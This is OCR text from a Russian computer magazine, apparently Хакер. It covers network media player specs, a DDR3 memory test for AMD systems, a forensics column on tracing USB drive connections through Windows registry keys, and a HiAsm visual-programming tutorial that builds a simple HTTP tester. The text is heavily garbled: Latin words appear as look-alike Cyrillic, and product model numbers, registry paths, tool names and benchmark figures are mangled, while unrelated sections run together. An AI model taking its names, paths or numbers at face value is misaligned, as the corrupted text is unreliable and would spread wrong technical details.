НОО в комплекте: Нет 
Пульт ДУ: Есть 
Габариты: 1 34x195x1 25 



Технические характеристики: 

Сеть: І_АЫ (ЕіЬегпеі] 10/100 Мбит/с 

Разъемы: НБМІ 1 .3, Композитный видеовыход, Компонентный видеовы- 
ход, Стереофонический аудиовыход, Цифровой коаксиальный аудиовы- 
ход, Цифровой оптический аудиовыход, 115В 2.0x2, МІПІІІ5В, Универсаль- 
ный считыватель карт памяти 5Б/ММС/М5, 5АТА Но5І 

Поддерживаемые форматы: 

Видео - МРЕ6-1/2/4, МРЕС-1/2 Р5 (М2Р, МР6), МРЕС-2, ѴОВ, АѴІ, А5Е, 
ѴѴМѴ, МКѴ(МаІго5ка], МОѴ(Н.264), МР4 

Аудио - АСЗ (ОоІЬу ОідМ, БТ5, ѴѴМА, ѴѴМА Рго, ААС, МР1 , МР2, БРСМ, 

ААС, М4А, МРЕОаибіо (МР1, МР2, МРА), ѴѴАѴ, ѴѴМА 
Изображения - 6РЕО НЭ, 6РЕО, ВМР, РІЧО 
Другое - 150, ІЕО 

Максимальное разрешение: 1 080р 

ИВО в комплекте: Нет (есть отсек для установки внутреннего 3.5” жесткого 
диска 5 АТА] 

ПультДУ: Есть 
Габариты: 21 0x51 хі 62 
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РЕВВІІЛЛ 



ТЕСТОВЫЙ СТЕНД 

СИСТЕМНАЯ ПЛАТА: АЗІІ5 Сгоззііаіг IV Рогтиіа 
ПРОЦЕССОР, МГЦ: 2700.аіЫопііХ4635 
ВИДЕОКАРТА: М8І Васіеоп № 4850 
БЛОК ПИТАНИЯ, ВТ: 700,Г5РВ1ие51огт 
ОПЕРАЦИОННАЯ СИСТЕМА: ѴѴіпсІоѵѵз 7 32-ЬіІ 




ТЕСТ ПАМЯТИ ОйРЗ 



Аксиома про то, что оперативной памяти много не бывает, известна всем уже давно. 
Проблема же заключается в том, чтобы правильно подобрать эту самую память - ее 
марку, объем, частоту и так далее. Наше сегодняшнее тестирование посвящено ОЗУ 
для платформы АМВ, которая имеет свои особенности. Следовательно, абы какая 
память нам не нужна, но и брать самое дорогое предложение рынка также не стоит, так 
как всеми его преимуществами мы воспользоваться все равно не сможем. Наш обзор 
как раз поможеттебе найти оптимальное решение. 



ТЕХНОЛОГИИ 

Какмыуже упоминали выше, у процессоров АМБ, а, следовательно, и 
у соответствующей платформы, есть некоторые особенности, которые 
накладываютопределенные ограничения на выбор памяти. Кним отно- 
сятся поддержка только двух каналов ОЗУ, а также максимальная частота 
памяти, которую можно получить, увеличивая делитель — 1800 МГц. 

Для достижения большихзначений придется заниматься оверклокин- 
гом Р5В, на что пойдет далеко не каждый пользователь. Крометого, в 
большинстве современных игр важны не мегагерцы итайминги памяти, 
которые сами по себе дадутминимальный прирост производительности, 
этакая вещь, как уже упомянутый ранее объем ОЗУ, использующийся для 
хранения красивейших (и объемнейших] текстур и прочих прелестей. Де- 
лая из вышесказанного вывод, нужно отметить, что приобретатьтоповое 
решение, видимо, особо смысла нет, лучше найти правильное соотноше- 
ние между всеми параметрами, то есть объемом, таймингами, мегагерца- 
ми и ценой. Толку оттакого взвешенного решения будет гораздо больше. 
Говоря об экономической составляющей приобретения памяти и помня о 
том, чтоу насестьтолькодва канала, мы логично взяли натестирование 
не просто отдельные планки памяти, а наборы, состоящие из двух моду- 
лей — это и удобно, и выгодно. 



МЕТОДИКА ТЕСТИРОВАНИЯ 

Приступая ктесту, мы решили попробовать преодолеть планку в 1800 МГц 
с помощью разгона по частоте шины. Однако на практике даже с частотой 
2000 МГц нам поработать не удалось, так как на ней соглашались работать 
далеко не все модули, да еще и в одноканальном режиме, что, какты 
понимаешь, нам не очень интересно. В итоге мы приняли соломоново 
решение —тестировать каждый комплектна максимально стабильной 
частоте. Ксчастью, они не оченьотличались, поэтому с одной стороны 
испытания сохранили объективность, а с другой — позволили выявить 
реальные показатели каждого комплекта. Кроме то го, у всех участи и ко в 
были одинаковыетайминги (9-9-9-24) и напряжение (1 ,65 В). 

Для собственно тестирования мы использовали программу 
ЗирегРІ с точностью до миллиона знаков, которая, кроме выдачи 
результата, служит еще и маркером стабильности, так как при 
переразгоне и вызванной им нестабильности мгновенно завершит 
тест; ЕѵегезП из которого были взяты цифры чтения, записи, копи- 
рования и латентности. Бенчмарк РСМагкѴапІа де, из которого мы 
запустили набор тестов памяти, также максимально нагрузил ОЗУ 
и выдал результат в баллах. Также был запущен и тест, встроенный 
в архиватор ѴѴіпРАР. 



► 020 
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АРАСЕР 6ІАИГ II 

ОК026А1. Р90К2 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



АРАСЕР 6ІАИТ II 

РК 046АЗ Р10К2 



ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 1 024 
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 1 800 
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 9-9-9-27 
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1 ,65 
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА 

■■■■■■■■■□ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 2048 
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2200 
НОМИНАЛЬНЫЕТАЙМИНГИ: 10-10-10-30 
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1 ,65 
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА 



+ 

Новичкам всегда везет, как говорится. Вот и компания Арасег, нетак 
ужи давно вышедшая на рынокоперативной памяти, предоставила 
нам на тест такой комплект, который сразу завоевал награду «Лучшая 
покупка». И совсем не просто так. В активеу этой памяти самая высокая 
частота работы (1980 МГц], до которой, надо отдать должное, и близко не 
подобрался никто из конкурентов, а также самая низкая латентность. 
Скорее всего это связано с не самым большим объемом, но фактостается 
фактом: время отклика — самое лучшее втесте. Ну и, конечноже, при- 
влекательная цена этих модулей и установленные на них радиаторы. 

Объем, который, вероятно, стал причиной высокой скорости работы этой 
памяти, все-таки сегодня довольно мал — ну что такое 2 Гб? Хотя, если 
ты ярый фанат ѴѴіпсІоѵѵзХР, то тебе он подойдет. Но для остальных будет 
явно мал. Номинальная частота составляет 1800 МГц, а номинальные 
тайминги равны 9, что весьма скромно смотрится на фоне восьмерок 
конкурентов при частоте 2200 МГц. Показатель записи данных в память 
также оказался весьма небольшим. 



■■■■■■■■■□ 

+ 

А вот этот комплект памяти от Арасег вследствие более высокого объема 
заслуживает гораздо более пристального внимания. Все-таки 4 Гб 
сегодня достаточно даже для работы новейшей ѴѴіпсІоѵѵз 7, то есть этим 
комплектом можно нетолько модернизировать компьютер, но и уста- 
новитьего итолькоего в новую машину. На первое время точно хватит. 
Крометого, данный набор обладает самым высоким результатом втесте 
на копирование данных в память, а установленные на нем алюминиевые 
радиаторы позволят избежать перегрева. 

Каки у младшего по объемам брата, тайминги этого комплекта застав- 
ляли нас содрогнуться. Ксчастью, платформа АМй гораздо менее, чем 
Іпіеі, чувствительна к данному параметру, поэтому в данной ситуации это 
не столь критично. Еще одна проблема, правда, не комплекта напрямую, 
вызвана тем, что найти его в российской рознице будет весьма пробле- 
матично. 
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РЕВКІІМ 



С0РЗАИШМШАТ0Р 

етх смбтх2 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 1 024 
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2250 
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 8-8-8-24 
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1 ,65 
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА 

■■■■■■■■□□ 

+ 

Сразу скажем, что это самый быстрый комплект в нашем сегодняшнем 
тесте. Даже его внешний вид весьма агрессивен за счет черно-крас- 
ного радиатора, который, помимо того, что радует взгляд, еще и весьма 
эффективно охлаждает модул и памяти. Заявленные базовыетайминги 
8-8-8-24 при частоте 2250 МГц выглядяточень впечатляюще. Несмотря 
на то, что мы проводили тест этих модулей с частотой 1 792 МГц, резуль- 
таты во всехтестах получились весьма впечатляющими, а итоговый бал 
в РСМагкѴапіаде стал вообщелучшим во всемтесте. Каквы яхту назове- 
те, как говорится — буквы СТХв названии этого комплекта стоятявно не 
только для красоты. 

Несмотря на высокую скорость, два гигабайта — это два гигабайта. Ко- 
нечно, ими можно дополнитьаналогичную память, они не помешают, но 
ставить только их в новую систему — это весьма сомнительный вариант. 
Цена комплекта достаточно высока. 



КШ6МАХ НЕРС1ЛЕ8 

ПКЕ85Р-В8ЮА РЕІН 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 2048 
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2200 
НОМИНАЛЬНЫЕТАЙМИНГИ: 10-10-10-30 
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1 ,5 
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА 

■■■■■■■□□□ 



+ 

Объем 4 Гб, которого сегодня вполне хватает, броский дизайн модулей, 
а также самое низкое номинальное напряжение в обзоре (да и вообще, 
далеко не каждая память может похвастаться 1 ,5 В) являются несомнен- 
ными плюсами этого комплекта. Ксожалению, несмотря на все это, для 
платформы АМ О эта память совершенно не подходит. Возможно, правда, 
что в связке с процессором I пііеі она проявит себя гораздо лучше. 

Ксожалению, недостатки комплекта существенно перевешиваютего до- 
стоинства, как по количеству, таки по качеству. Это и тайминги, и невысо- 
кие результаты в тестах (скорость записи в память не смогла перевалить 
рубеж в 7 Гб/сек]. Ну, а про крайне высокую цену и говорить нечего. 
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КШСЗТОИ НУРЕРХ 

КНХ2000С803Т1 К2/46Х 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



КШ63Ш НУРЕРХ 

КНХ21 ЗЗС803Т1 К2/46Х 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 2048 
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2000 
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 8-8-8-24 
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1 ,65 
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА 



ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 2048 
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2 133 
НОМИНАЛЬНЫЕТАЙМИНГИ: 8-8-8-24 
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1 ,65 
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА 



□ □□ 



+ 

У компании Кіпдзіоп, как ни крути, имеется огромный опыт в разработке 
и производстве оперативной памяти, поэтому не стоит удивляться тому, 
что этот комплект получился весьма и весьма впечатляющим, а также 
удостоился высокой награды нашего теста. Объем его вполне доста- 
точен, результаты тестов высоки, а вѴѴіпПАРон вообще стал лидером 
теста, также каки в чтении из памяти. Серия НурегХ снова доказала свои 
скоростные преимущества. Ввидутаких итогов можно смело сказать, что 
цена набора вполне адекватна, и мы смело рекомендуем его покупате- 
лям. Кстати, на частоте 2000 МГцстаймингами 8-8-8-24он заработал, но 
только в одноканальном режиме... 

Выискивать недостатки у такой памяти — дело весьма и весьма неблаго- 
дарное, потой причине, что иху нее нет. Надо отдатьдолжное инжене- 
рам Кіпдзіоп, которые создали скоростное, взвешенное и недорогое 
решение. 



+ 

Внешних, да и содержательных отличий у двух комплектов памяти от 
Кіпдзіоп, присутствующих в нашем тесте, весьма немного. Точнее, вне- 
шне они вообще идентичны. Те же самые синие радиаторы, которые по- 
могают модулям избежать перегрева. Как видно из графиков, результаты 
тестирования обоих комплектов очень близки. Поэтому истинная разница 
между ними заключается в цене, атакже в повешенной на 133 МГц 
номинальной частоты у да иного набора. 

Но, учитывая ограничения платформы АМй, 2133 МГц тебе полу- 
чить неудастся, поэтому вдвое (по сравнению с Кіпдзіоп НурегХ 
КНХ2000С803Т1 К2/4ВХ] переплачивать смысла нет никакого. Как видно 
из графика, частота стабильной работы у двух этих модулей абсолютно 
одинаковая. 



ВЫВОДЫ 

Мы убедились, что на платформе АМО более важны не ме- 
гагерцы памяти, а баланс между ними и таймингами. Титул 



«Выбор редакции» сегодня достается комплекту Кіпдзіоп 
НурегХ КНХ2000С803Т1 К2/40Х, за его выдающиеся харак- 
терна ики. А «Лучшая покупка» — это Арасег біапі II Ш К 
02 СА1_ Р9(Ж2].з: 
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РЕВКІІЛЛ 



МАКСИМАЛЬНО СТАБИЛЬНАЯ ЧАСТОТА РСМАКК 



Арасег біапі II (ОК 026АІ. Р90К2) 
Арасег 6іап( II (ОК 046А5 Р1 ОК2) 
Кіпдзіоп КНХ 2000 С8РЗТ1 К2/46Х 
Кіпдзіоп КНХ 21 33 С803Т1 К2/46Х 
ТгапзсепсІ ТХ2000 КШ-46К 




Согзаіг Оотіпаіог 
6Т СМ6Тх2(РІ.КЕ85Р-В8ЮА РЕІН 




О 500 1000 1500 2000 



Лучшего результата по частоте удалось добиться с младшим 
комплектом от Арасег 



Арасег біапі II (ОК 026АІ. Р90К2) 
Арасег біапі II (йК 046А5 РЮК2) 
Кіпдзіоп КНХ 2000 С803Т1 К2/46Х 
Кіпдзіоп КНХ 21 33 С803Т1 К2/46Х 
ТгапзсепсІ ТХ2000 КШ-46К 




Согзаіг Оотіпаіог 
6ТСМ6Тх2(РІ.КЕ85Р-В8ЮА РЕІН 




Поскольку данный бенчмарк имитирует выполнение реаль- 
ных задач, нагрузка ложится не только на память, но и на 
центральный процессор 



РЕЗУЛЬТАТ В 51ІРЕКРІ РЕЗУЛЬТАТ В ѴШКАК 



Арасег біапі II (йК 026АІ. Р90К2) 
Арасег біапі II (йК 046А8 Р1 0К2) 
Кіпдзіоп КНХ 2000 С803Т1 К2/46Х 
Кіпдзіоп КНХ 21 33 С803Т1 К2/46Х 
ТгапзсепсІ ТХ2000 КШ-46К 



Кіпдтах Негсиіез 

-В8ЮАРЕІН 



Согзаіг Оотіпаіог 
ВТ СМ6Тх2(РІКЕ85Р-В8Ш РЕІН 




Арасег біапі II (йК 02САІ Р90К2) 
Арасег біапі II (0К04ВА5РШК2) 
Кіпдзіоп КНХ2000 С803Т1К2/46Х 
Кіпдзіоп КНХ2133 С803Т1К2/46Х 
ТгапзсепсІ ТХ2000 Ш-46К 



Кіпдтах Негсиіез 

-В8ЮА РЕІН 



Согзаіг Оотіпаіог 
6ТСМ6Тх2(РІ.КЕ85Р-В8МАРЕІН 




0 500 1000 1500 2000 



2500 



Лучший тест на стабильность работы, в котором комплект от Казалось бы, архивирование — процесс очень чувствитель- 

ТгапзсепсІ выигрывает у аутсайдера аж секунду! ный к скорости памяти, однако разница между результатами 

участников не превышаетз% 



ЛАТЕНТНОСТЬ 



ЕѴЕКЕ5Т, КОПИРОВАНИЕ 



Арасег біапі II (йК 02САЬ Р90К2) 
Арасег біапі II (0К04ВА5РШ2) 
Кіпдзіоп КНХ 2000 С863Т1 К2/46Х 
Кіпдзіоп КНХ 21 33 С863Т1 К2/46Х 
ТгапзсепсІ ТХ2000 КШ-46К 




Согзаіг Оотіпаіог 
6Т СМ6Тх2(РІ.КЕ85Р-В8ЮА РЕІН 




Арасег біапі II (йК 026АІ Р90К2) 
Арасег біапі II (0К046А5РЮК2) 
Кіпдзіоп КНХ 2000 С803Т1 К2/46Х 
Кіпдзіоп КНХ 21 33 С803Т1 К2/46Х 
ТгапзсепсІ ТХ2000 КЮ-46К 



Кіп 



шах Негсиіез 
В8ЮА РЕІН 



Согзаіг йотіпаіог 
ВТ СМ6Тх2(РІ.КЕ85Р-В8ЮА РЕІН 




Как правило, модули с большим объемом отличаются более В тесте на копирование разница между лучшим и худшим 
высокой латентностью, что и подтвердил данный тест результатом составила всего 5% 



ЕѴЕРЕ5Т. ЧТЕНИЕ 



Арасег біапі II р 026АІ. Р90К2) 
Арасег біапі II (0К046А5РШК2) 
Кіпдзіоп КНХ2000 С803Т1К2/46Х 
Кіпдзіоп КНХ2133 С803Т1К2/46Х 
ТгапзсепсІ ТХ2000 КЮ-46К 




Согзаіг Оотіпаіог 
ВТ СМ6Тх2(РІ.КЕ85Р-В8МА РЕІН 




12000 



ЕѴЕКЕ8Т, ЗАПИСЬ 



Арасег біапі II (0К 026АІ Р90К2) 
Арасег біапі II (0К046А5РЮК2) 
Кіпдзіоп КНХ 2000 С803Т1 К2/46Х 
Кіпдзіоп КНХ 21 33 С803Т1 К2/46Х 
ТгапзсепсІ ТХ2000 КШ-46К 



Кіп 



шах Негсиіез 
-В8ЮАРЕІН 



Согзаіг Оотіпаіог 
ВТ СМ6Тх2(РІ.КЕ85Р-В8ЮА РЕІН 




В лидерах — память от Арасег, Согзаіг и Кіпдзіоп 



Этот тест нагляднее всего отражает разницу между участни- 
ками 
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I Степан «51ер» Ильин іѵѵіІІег.сот/зІераЬ 





Есть интересное направление в информа- 
ционной безопасности, которое мы часто 
обходим стороной. Я говорю о ЬгеПБІСЗ. В 
#100 номере ][ у нас была замечательная 
статья «Попался: твой компьютер у них в 
руках», где мы рассказывали об инструмен- 
тах, которые используются специалистами 
для исследования компьютеров, проходящих 
в рамках какого-то следствия. Основной 
интерес богепзіс — отыскать различного 
рода доказательства, скрытые и удаленные 
файлы, логи действий на компьютере, Ызіогу 
браузера и все-все, что может косвенно быть 
полезным или подтвердить какие-то факты. 
Тема это довольно обширная, интересная, 
и многое здесь совсем не так очевидно, как 
может показаться на первый взгляд. Хочу 
тебе поведать историю, рассказанную мне 
одним знакомым специалистом по ИБ, кото- 
рого наняли для проведения небольшого 
информационного аудита. Все началось с 
того, что из компании каким-то образом утек- 
ли некоторые данные, которым «снаружи» 
светиться было крайне нежелательно. Файлы 
осознанно хранились только на одном ком- 
пьютере, который не был подключен в сеть. 
Авторизация была реализована с помощью 
ББВ-ключей и какой-то самопальной про- 
граммы по схеме «вставляешь флешку со 
специальным ключом в Б5В-порт, програм- 
ма считывает его, и разлочивает систему». 
Печально в этой истории то, что такие ключи 
были у всех сотрудников, при этом никакого 
журнала авторизаций не велось. А задача, 
между тем, была поставлена непростая — 
выяснить, кто имел доступ к компьютеру. 

По правде говоря, я бы сходу едва ли смог 
что-то придумать. У человека же, который 
профессионально занимается іюгепзіс, сразу 
появился план решения проблемы. И в этом 
ему помогла сама ѴѴіпсІоѵѵз. 

Оказывается, информация обо всех внеш- 
них накопителях, которые подключаются к 
компьютеру, логируется и записывается в 
реестр. Реестр — это вообще непаханое поле 
для следствия. Практически любая актив- 
ность в системе, так или иначе, оставляет 
следы в реестре. Вот и в нашем случае из 
реестра можно выудить не только различные 
данные о том, какие внешние накопители 
подключались в систему. Мало того, когда 

- ► 025 




Данные из реестра 



были произведены последние подключения. 
Давай разберемся, что происходит, когда к 
компьютеру подключается внешний нако- 
питель. Сначала менеджер РпР распознает 
девайс и устанавливает его, используя чаще 
всего обычный Б5В-драйвер 115В Ргіѵег 
ІІ5В5Т0Р.5Ѵ5. Далее в работу вступает 
менеджер монтирования (МоипМдг.зуз), 
который запрашивает у девайса его уни- 
кальные идентификационные данные — это 
серийный номер, информация о продукте и 
производителя. Как только они получены, 
он создает в реестре несколько ключей, 
которые позволяют системе дальше рабо- 
тать с флешкой. В результате для каждого 
подключенного носителя в реестре есть 
отдельная ветка с информацией о нем. Весь 
это клад данных хранится здесь: НКІ_М\ 
5Ѵ5ТЕМ\СиггепЮоп1хо15еЛЕпит\ІІ5В5Т0Р. 
Список накопителей, которые когда-либо 
подключались к компьютеру, уже был бы 
неплохим результатом. Но, согласись, гораз- 
до лучше знать еще и когда флешки были 
подключены в систему. В упомянутой ветке 
реестра фиксируется время, когда флешка 
была подключена впервые, но нет данных 
о том, когда ее подключали в последний 
раз, а эти данные очень пригодились бы. 

Но и здесь выручает реестр. В ветке НКЕѴ_ 
Е0САЕ_МАСН1ЫЕ\5У5ТЕМ\СиггепЮопФо[5е!\ 
СопігоІ\ВеѵісеСІаз5ез\{53^56307-Ь6ЬМ 1 60- 
94б2-00а0с9 1 ебЬ8Ь} есть множество ключей 
определенного формата. Если отыскать здесь 
ключ, относящийся к конкретной флешке (а 
это делается по специальному идентифи- 
катору], и если у него есть подключ Сопітоі, 
то из него как раз и можно извлечь время 
последнего подключения. На английском 




языке есть замечательная книжка «ѴѴіпсІоѵѵз 
Еогепзіс Апаіузіз» (Нагіап Сагѵеу], в кото- 
ром подробно изучаются подобные методы 
извлечения данных. В нашей же ситуации 
энтузиасты сильно упростили задачу, напи- 
сав утилиту изЬНізІюгу [ зоигсеФгде.пеІ:/ 
ргоіесІз/изЬЫзІогу ]. Она сама извлекает 
данные, парсит все необходимые ключи в 
реестре, разбирает их значения и выводит 
информацию в удобочитаемом виде: 

ІІЗВ НізСогу Битр 
Ьу паЬіу (с) 2008 

(1) БЗВ Беѵісе 

іпзБапсеІБ: 1001178901ЬЗ^б&0 
РагепБІсІРгеІіх : 

Бгіѵег : { 4<іЗбе9б7-е325-11се-ЬЕс1- 
08002Ье10318}\0032 
Бізк Зкатр: 03/28/2010 18:10 
оіите Зкатр: 11/03/2009 17:26 

(2) БЗВ РІазЪ. Бгіѵе БЗВ 

Беѵісе 



Вся информация — как на ладони. Не 
лишним будет рассказать конец истории 
с утечкой конфиденциальных докумен- 
тов. Когда из реестра были вытащены все 
данные о подключенных носителях, сопо- 
ставлены даты последних подключений и 
версии опубликованного документа, быстро 
определился список тех флешек, на которых 
могли быть украдены данные. Еще некото- 
рое время ушло на изучение пендрайвов 
сотрудников, после чего один из подо- 
зреваемых просто сознался. Вот такое вот 
маленькое следствие, т 
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Для того чтобы написать полезное приложение, необязательно знать какой-то 
сложный язык программирования. Несложную сетевую утилиту, панель для 
управления роутером, удобный парсер информации и многое другое можно 
создать без единой строчки кода. Если под рукой есть конструктор приложений. 



Все когда-то начиналось с Ассемблера. Машинный язык мнемони- 
ческих команд был полностью завязан на архитектуру процессора, 
под который писалась программа, но при этом стал одним из первых 
общеиспользуемых языков программирования. Позже появились 
языки высокого уровня, абстрагирующие программиста от аппа- 
ратной части: Вазіс, Разсаі, С и другие. Гораздо больше времени 
потребовалось на осмысление, понимание и реализацию объектно- 
ориентированного подхода (ООП) в программировании, которое позво- 
лило еще проще описывать объекты реального мира терминами мира 
виртуального и породило букет языков следующего поколения, в том 
числе Ое1рЫ и С++. Среды для этих языков впервые стали вводить в 
обиход понятие «визуальное программирование», которое использо- 
валось исключительно в конструкторах форм и интерфейсов. Наконец, 
последней волной стало появление сред, позволяющих визуализиро- 
вать все этапы разработки ПО — от проектирования внешнего вида до 
реализации программного ядра — І_аЬѴіеѵѵ, НіАзт, Зо^ѴѴіге и прочие. 
Как это выглядит? Сейчас разберемся. 

ЗНАКОМЬТЕСЬ - НІАЗМ 

НіАзт — среда визуального программирования, программы в которой 
не пишутся, как это делается в классических языках, а проектируются 
из кубиков и линий связей между ними. Каждый такой кубик представ- 
ляет собой элемент, который выполняет какое-то достаточно простое 
и узкоспециализированное действие (например, копирует файл, про- 
игрывает звук, складывает два числа, качает файл из интернета и т.д. 



и т.п.]. Горизонтальные линии между элементами (или просто «связи») 
определяют логику будущей программы (то есть последовательность 
вызова событий и методов, если выражаться терминами классических 
языков программирования). Вертикальные же связи указывают эле- 
ментам на то, какие данные откуда брать. Также у каждого элемента 
есть набор уникальных свойств, которые определяют особенности его 
функционирования (к примеру, у элемента «Кнопка» есть свойства, 
определяющие его положение на форме, заголовок, используемый 
шрифт, текст выводимой подсказки и прочие). Поэтому весь процесс 
конструирования сводится к расстановке элементов, протягиванию 
связей между ними и настройке (если необходимо) их свойств. 
Посмотрим, как выглядит нарисованная таким образом программа 
классического «Неііо ѵѵогісі ! », которая при нажатии кнопки выводит 
на экран соответствующее сообщение. Внешний вид схемы, реали- 
зующей данный функционал, представлен на рисунке. Собранное 
приложение состоит из двух элементов: Кнопка (Вііііоп) и Сообщение 
(Меззаде), одной связи между ними (проложенную от события нажатия 
кнопки к методу показа сообщения) и одного измененного свойства 
Меззаде (с текстом «Неііо ѵѵогісі!»). Мы не пишем ни одной строчки 
кода, но если заглянуть в исходник, то увидим исходник, который сге- 
нерировала НіАзт: 

Маке (деірііі) 

АсИ (МаіпРогт, 2 9537 0 6 , 21 , 105 ) 

{ 
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Внешний вид приложения в редакторе форм 



} 

Аскі (Виккоп, 147563,189,105) 

{ 

Ьекк=180 

Тор=110 

Ііпк (опСІіск, 5363509 ісІоМеззаде, [] ) 

} 

I Асісі (Мез заде ,5363509,238,105) 

{ 

Меззаде= "Неііо ѵѵогісі! ! ! " 

} 

Сгенерированный код написан на языке ОЬіесІ: Разсаі, но есть и 
другие варианты. По сути, НіАзпп представляет собой не более чем 
графический векторный редактор. А все его возможности по созданию 
приложений определяются уставленными пакетами и компиляторами. 
На текущий момент времени самым мощным из них является пакет 
ѴѴіпбоѵѵз, использующий в качестве целевого языка О Ь] е сі: Разсаі для 
компиляторов РРС и Оеірбі. Помимо этого существуют следующие 
пакеты: 

• РоскеіРС с целевым языком С++ и компилятором М3 АРМ для плат- 
формы МісгозоГС ѴѴіпбоѵѵз Мобііе; 

• ѴѴЕВ — целевой язык РНР с поддержкой баѵаЗспірІ и НТМІ_; 

• ОТ — целевой язык С++ для платформ ѴѴіпсІоѵѵз, І_іпих и МасОЗ; 

• ѴВ5 — целевой язык Вазіс платформа ѴѴіпсІоѵѵз и прочие менее раз- 
витые. 

Также в статусе «щзі Іо г Іип» существует опііпе-версия НіАзпп [ Ыоп. 
Ьіазт.сот ). с помощью которой можно поучиться составлять схемы, 
имея под рукой лишь браузер. 

ПИШЕМ ТЕСТЕР ВЕБ-СЕРВЕРА 

Мы возьмем самый стандартный пакет под ѴѴіпсІоѵѵз (на сайте Ыазпп. 
сот сейчас доступна версия 4.4] и попробуем написать упрощенный 
аналог утилиты аЬ из пакета приложений арасбе-іооіз. Основная 
задача этой утилиты — отправка запросов веб-серверу на получение 
данных по указанному ЭРЕ и измерение времени, которое потре- 
бовалось на их выполнение. В примере ниже мы будем отправлять 
по 100 последовательных запросов на адрес ЬйрУ/уа.ги и измерять 
время, которое на это ушло. Итак, первый этап. Для начала соберем 
простую схему, которая по нажатию кнопки на форме отправит только 
один запрос и выведет его содержимое на экран. Для этого откроем 
НіАзпп и создадим новый проект: «Файл Новый...», далее выбираем 
«ѴѴіпсІоѵѵз Приложение ѴѴіпсІоѵѵз». После нажатия «ОК» переходим в 
режим редактирования формы «Вид -> Редактор формы». Вытаскиваем 
на форму с вкладки «Интерфейс» элементы «Кнопка» и «Редактор 
текста», после чего с помощью редактора форм размещаем их так, как 
нам это удобно. Теперь нам нужен элемент, который умеет соединяться 
с удаленным сервером по протоколу ТСР и отправлять ему некоторые 
данные. Для этого вытаскиваем с вкладки «Интернет» элемент с име- 
нем «ТСР-клиент». В его свойствах указываем стандартный порт для 



НТТР-сервера — 80, и ІР адрес уа.ги — 93.158.134.3. Теперь вытащим 
элемент, который умеет хранить многострочный текст. Он находится на 
вкладке «Строки» и называется «Список строк». В его свойство Зітіпдз 
запишем текст НТТР-запроса для получения содержимого корня сайта: 

СЕТ / НТТР/1.1 
Нозк: уа.ги 
Соппескіоп: сіозе 
<пустая строка> 

<пустая строка> 

Обрати внимание на то, что в конце запроса должны стоять две пустые 
строки. Теперь осталось соединить все эти элементы так, как показано 
на рисунке. В схеме был также использован элемент «Разветвитель 
( Н и Ь ] » , который находится на вкладке «Инструменты» и занимается 
только тем, что последовательно вызывает два события справа при 
вызове метода слева. Теперь запускаем программу и убеждаемся, что 
после нажатия кнопки нам приходит ответ от сервера, который должен 
начинаться со строки «НТТР/1.1 200 ОК». 

Теперь попробуем понять, что и как у нас происходит в схеме после 
нажатия кнопки на форме: 

• элемент «Кнопка» генерирует внутреннее событие опСІіск (един- 
ственная точка на его правой стороне); 

• это событие вызывает метод боЕѵепІІ элемента «Разветвитель»; 

• элемент «Разветвитель», как уже было написано выше, последова- 
тельно вызывает события опЕѵепИ и опЕѵепі2; 

• первым происходит событие опЕѵепИ, которое вызывает метод 
боОреп элемента «ТСР-клиент». Именно в этот момент происходит 
соединение с сервером уа.ги по 80 порту; 

• после того, как соединение установлено, и управление вернулось в 
программу, происходит следующее событие хаба опЕѵепі2; 

• оно, в свою очередь, вызывает метод боЗепб элемента «ТСР- 
клиент». Этот метод в процессе своей работы задействует верхнюю 
точку Оаіа, с которой получает данные для отправки на сервер. В 
нашем примере эта точка соединена с нижней точкой Техі элемента 
«Список строк», которая, в свою очередь, возвращает текст, содержа- 
щийся в списке, то есть заголовок запроса к серверу; 

• и, наконец, после отправки запроса элемент «ТСР-клиент» в асин- 
хронном режиме принимает ответ сервера и выдает его в поток на 
правую точку опРеаб; 

• точка опРеаб соединена с точкой боАбб элемента «Редактор текста», 
которая принимает данные из потока и добавляет их в редактор. 
Следует обратить внимание на то, что методы элементов могут при- 
нимать данные как со своих верхних точек, так и из потока. В грамотно 
спроектированной схеме большинство методов читает нужные им 
данные именно из потока, что избавляет от необходимости проклады- 
вать дополнительные связи и визуально разгружает схему. Скажем, в 
примере выше текст запроса можно было поместить в свойство Оаіа 
элемента «Кнопка», а элемент «Список строк» удалить совсем. При 
таком включении событие опСІіск выдало бы эти данные в поток, кото- 
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Схема приложения тестирования сервера (шаг і) 



